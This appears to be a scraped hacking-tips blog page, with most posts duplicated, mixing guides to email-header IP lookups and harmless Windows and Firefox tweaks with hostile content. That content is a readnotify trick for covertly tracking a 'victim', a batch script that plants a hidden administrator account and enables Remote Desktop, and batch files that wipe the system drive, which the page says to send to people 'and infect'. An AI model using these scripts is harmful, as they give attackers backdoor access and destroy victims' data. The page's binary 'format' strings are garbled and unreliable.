Yahoo! headers : ******* (sender's name)
Look for Received: from followed by the IP address between square brackets [ ].
That is be the IP address of the sender!
6. Track the IP address of the sender
__________________
Find IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4.If you do not see the headers above the mail message, your headers are not displayed.To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : *******(sender's name), followed by IP address within square brackets[]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers :******(sender's name)
Look for Received: from followed by IP address within square brackets[].
Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : *******(sender's name)
Look for Received: from followed by IP address within square brackets[]. Jump to step
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender.
__________________
Once u have it.
Go to
Code:
http://www.readnotify.com
register there...
Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com
But before sending the mail just add ".readnotify.com" with the victims id.. for example
xxxxx@yahoo.com.readnotify.com
and then send it...
when ever victim opens it his all the info will be mailed to u.
which can b very useful for the hackers.
Note = U can also change the settings in
Code:
www.readnotify.com
__________________
Find IP Address in GMail
1. Log into your Gmail account and open the mail.
2. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
3. You should get headers like this:
Gmail headers : Vinayak
Look for Received: from followed by a few hostnames and an IP address between square brackets. That is be the IP address of the sender!
4. Track the IP address of the sender
__________________
Find IP address in Yahoo Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : ******* (sender's name)
Look for Received: from followed by the IP address between square brackets [ ].
That is be the IP address of the sender!
6. Track the IP address of the sender
__________________
Find IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4.If you do not see the headers above the mail message, your headers are not displayed.To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : *******(sender's name), followed by IP address within square brackets[]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers :******(sender's name)
Look for Received: from followed by IP address within square brackets[].
Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : *******(sender's name)
Look for Received: from followed by IP address within square brackets[]. Jump to step
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender.
__________________
Watch Megavideo and other sites without limitations!!!!
here's a awesome addon for mozilla
Code:
https://addons.mozilla.org/en-US/firefox...=illimitux
Illimitux FireFox extension is a tool that removes the limitations imposed by streaming platforms as Veoh, Megavideo or MegaUpload. In the case of MegaUpload (file sharing platform), you can stream a file (watch it in live) or download it without waiting 45 seconds.
Code:
https://addons.mozilla.org/en-US/firefox...=illimitux
Illimitux FireFox extension is a tool that removes the limitations imposed by streaming platforms as Veoh, Megavideo or MegaUpload. In the case of MegaUpload (file sharing platform), you can stream a file (watch it in live) or download it without waiting 45 seconds.
Hey guys i have been playing around with bat scripts and i found this small code that will let you create a admin account and hide it from the super admin. so in case you get a chance to access a box with admin status all you have to do is to copy this code to note pad and make the changes and save it as .bat and run it. and then you have your own admin account which is hidden
Code:
@Echo Off
SET /P usr=[Enter new username here:]
SET /P pwd=[Enter new password here:]
:: SET /P takes the user input and puts it into the variable.
echo — Creating New User, “%usr%” with password “%pwd%” –
net user “%usr%” “%pwd%” /add
echo — Adding User to Group Administrator –
net localgroup Administrators %usr% /add
echo — User Is Now Administrator — >>
echo — Hidding User –
REG ADD HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList /v %usr% /t REG_DWORD /d 0 /f
echo — Activating Terminal Service –
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0
echo — Activating Terminal Service Done –
SET /P =Press Enter to continue . . .
Exit
Copy this to notepad. save it as install.bat run it. follow the screenshot and enter your desired username & password. done
http://img171.imageshack.us/img171/7660/useryz9.jpg
Code:
@Echo Off
SET /P usr=[Enter new username here:]
SET /P pwd=[Enter new password here:]
:: SET /P takes the user input and puts it into the variable.
echo — Creating New User, “%usr%” with password “%pwd%” –
net user “%usr%” “%pwd%” /add
echo — Adding User to Group Administrator –
net localgroup Administrators %usr% /add
echo — User Is Now Administrator — >>
echo — Hidding User –
REG ADD HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList /v %usr% /t REG_DWORD /d 0 /f
echo — Activating Terminal Service –
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0
echo — Activating Terminal Service Done –
SET /P =Press Enter to continue . . .
Exit
Copy this to notepad. save it as install.bat run it. follow the screenshot and enter your desired username & password. done
http://img171.imageshack.us/img171/7660/useryz9.jpg
Branding Windows With Your Name
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
Format HDD With Notepad
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says0100101100011111001001010101010101000001111110 0000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Copy The Following In Notepad Exactly as it is.
says0100101100011111001001010101010101000001111110 0000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Mozilla Easter Egg
With the release of Firefox 3.0 Beta5, Mozilla has an Easter Egg.
Type “about:robots” in Firefox address bar and press Enter.
It’ll show a page having title as “Gort! Klaatu barada nikto!” with some pretty cool stuff.
Type “about:robots” in Firefox address bar and press Enter.
It’ll show a page having title as “Gort! Klaatu barada nikto!” with some pretty cool stuff.
Start computer in 10 seconds
Click on the start button then press R it will take u to Run well go to runand type Regedit
press enter
this will open Registery Editor
now look for the key
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Contr ol\ContentIndex
now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result
press enter
this will open Registery Editor
now look for the key
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Contr ol\ContentIndex
now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result
Subscribe to:
Posts (Atom)